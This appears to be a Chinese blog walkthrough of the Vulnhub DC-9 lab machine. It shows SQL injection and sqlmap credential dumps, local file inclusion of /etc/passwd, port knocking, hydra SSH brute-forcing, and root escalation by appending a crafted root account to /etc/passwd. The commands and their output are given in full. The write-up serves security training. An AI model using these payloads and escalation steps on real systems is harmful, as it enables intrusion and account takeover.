Vulnhub-DC-9

靶机IP:192.168.20.144

kaliIP:192.168.20.128

网络有问题的可以看下搭建Vulnhub靶机网络问题(获取不到IP)

信息收集

nmap扫描一下端口及版本号

dirsearch扫目录

最后去前端界面观察发现也没什么隐藏路径。

观察功能,search引起注意,SQL注入测试

当输入111' or 1=1#时,

会把所有信息全部搜索出来,判断此处存在SQL注入

漏洞利用

之后丢到sqlmap上去跑

因为是post方式注入,所以用burp抓包,存个文件,用-d参数引用。

sqlmap -r sql.txt -p search --dbs

bash 复制代码
[15:34:06] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users

--current-db得到当前数据库是Staff,看着user比较敏感,先去user库看下(其实user库信息不能利用)
sqlmap -r sql.txt -p search --tables -D users

bash 复制代码
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+

sqlmap -r sql.txt -p search --columns -T UserDetails -D users

bash 复制代码
Database: users
Table: UserDetails
[6 columns]
+-----------+-----------------+
| Column    | Type            |
+-----------+-----------------+
| firstname | varchar(30)     |
| id        | int(6) unsigned |
| lastname  | varchar(30)     |
| password  | varchar(20)     |
| reg_date  | timestamp       |
| username  | varchar(30)     |
+-----------+-----------------+

sqlmap -r sql.txt -p search --dump -T UserDetails -D users

bash 复制代码
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+

之后去网站登录,结果发现拿到的账号密码都无法登录。

那么就去Staff库看看吧,sqlmap的命令就不再贴了。

拿到信息

bash 复制代码
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password                         | Username |
+--------+----------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc | admin    |
+--------+----------------------------------+----------+

Password是MD5,解密得到transorbital1

之后登入网站,寻找利用点

这儿可能存在文件包含漏洞在Vulnhub-DC-5中也涉及到了这个漏洞,在DC-5解释了漏洞原因。

也是不知道include的参数,要用字典猜测。

这里用DC-5的LFI字典,是fuzz不出来的。

为什么,看下DC-5的源码

DC-的源码

DC-8include参数组成是,directory/+$file (directory/目录是不存在的)

DC-5include参数就是传入的file值,直接访问绝对路径就可以了

而在DC-8总我们需要.../跳到根目录再去访问,所以这里换一个字典

下面是fuzz的结果。

发现和DC-的参数都是file

看下passwd

发现了我们在user数据库中拿到的用户名(刚才没有尝试SSH连接,接下来试试)

用爆破,发现ssh连接不上(在信息收集时就能发现ssh22端口没有开)

因为靶机开启了knock:端口敲门服务

根据knock配置文件路径看下敲门的顺序7469,8475,9842

之后在kali下载knock,(也可以用nmap敲门for x in 7469 8475 9842; do nmap -Pn --max-retries 0 -p $x 192.168.20.144; done

bash 复制代码
┌──(root㉿kali)-[/home/kali]
└─# knock 192.168.20.144 7469 8475 9842

提权

敲门之后查看ssh已经开启

bash 复制代码
┌──(root㉿kali)-[/home/kali]
└─# nmap -sV -A -p 22 192.168.20.144
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-14 22:42 CST
Nmap scan report for 192.168.20.144
Host is up (0.00043s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2b3387432740bc516dc13decb9b8ac3 (RSA)
|   256 065c93871554686b889155cff89ace40 (ECDSA)
|_  256 e42c88da8863268c93d5f7632ba3ebab (ED25519)
MAC Address: 00:0C:29:65:6B:4B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

之后用hydra爆破ssh,发现三个账号可用

bash 复制代码
┌──(root㉿kali)-[/home/kali/Desktop/DC-9]
└─# hydra -L user.txt -P pass.txt ssh://192.168.20.144
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-14 22:46:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 324 login tries (l:18/p:18), ~21 tries per task
[DATA] attacking ssh://192.168.20.144:22/
[22][ssh] host: 192.168.20.144   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.20.144   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.20.144   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-14 22:47:32

ssh连接这三个账号看看有啥信息,最后在janitor的路径下发现了几个密码

bash 复制代码
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

我们丢到hydra中再跑一遍,又拿到了一组用户密码

bash 复制代码
[22][ssh] host: 192.168.20.144   login: fredf   password: B4-Tru3-001

看下能提权的东西,发现可root执行/opt/devstuff/dist/test/test

bash 复制代码
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

执行下看看

bash 复制代码
fredf@dc-9:~$ /opt/devstuff/dist/test/test
Usage: python test.py read append

给了使用说明我们去找下test.py

bash 复制代码
find / -name test.py > pass.txt
fredf@dc-9:/tmp$ cat pass.txt 
/opt/devstuff/test.py
/usr/lib/python3/dist-packages/setuptools/command/test.py

查看test.py内容

bash 复制代码
fredf@dc-9:/tmp$ cat /opt/devstuff/test.py
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

意思是打开文件并追加到XX最后

这样可以想到在passwd或者sudoers中追加权限信息进行提权

下面是在passwd中添加

先用openssl生成密码的哈希是,盐值为haha

其他方法参考linux提权------passwd提权

bash 复制代码
fredf@dc-9:/tmp# openssl passwd -1 -salt haha 123456
$1$haha$T7nt1ThchynsrEviA0KLT0
fredf@dc-9:/tmp$ echo 'y06z:$1$haha$T7nt1ThchynsrEviA0KLT0:0:0::/root:/bin/bash' > a
fredf@dc-9:/tmp$ vi a
fredf@dc-9:/tmp$ sudo /opt/devstuff/dist/test/test a /etc/passwd
fredf@dc-9:/tmp$ su y06z
Password: 
root@dc-9:/tmp# find / -name *flag*
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/sda/hctx0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/var/lib/mysql/debian-10.3.flag
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/root/theflag.txt
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/ss_flags.ph
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/waitflags.ph
/usr/bin/dpkg-buildflags
/usr/include/x86_64-linux-gnu/asm/processor-flags.h
/usr/include/x86_64-linux-gnu/bits/waitflags.h
/usr/include/x86_64-linux-gnu/bits/ss_flags.h
/usr/include/linux/kernel-page-flags.h
/usr/include/linux/tty_flags.h
/usr/share/man/man3/fegetexceptflag.3.gz
/usr/share/man/man3/fesetexceptflag.3.gz
/usr/share/man/nl/man1/dpkg-buildflags.1.gz
/usr/share/man/de/man1/dpkg-buildflags.1.gz
/usr/share/man/man1/dpkg-buildflags.1.gz
/usr/share/man/fr/man1/dpkg-buildflags.1.gz
/usr/share/man/man2/ioctl_iflags.2.gz
/usr/share/dpkg/buildflags.mk
root@dc-9:/tmp# cat /root/theflag.txt


███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝
                                                                             
Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding.  :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.
相关推荐
黑客Ash7 小时前
【D01】网络安全概论
网络·安全·web安全·php
.Ayang9 小时前
SSRF漏洞利用
网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
.Ayang9 小时前
SSRF 漏洞全解析(概述、攻击流程、危害、挖掘与相关函数)
安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构
网络安全-老纪9 小时前
iOS应用网络安全之HTTPS
web安全·ios·https
Mr.Pascal10 小时前
刚学php序列化/反序列化遇到的坑(攻防世界:Web_php_unserialize)
开发语言·安全·web安全·php
dot.Net安全矩阵12 小时前
.NET 通过模块和驱动收集本地EDR的工具
windows·安全·web安全·.net·交互
Hacker_Oldv12 小时前
网络安全的学习路线
学习·安全·web安全
黑客Ash12 小时前
计算机中的网络安全
网络·安全·web安全
恃宠而骄的佩奇13 小时前
i春秋-签到题
web安全·网络安全·蓝桥杯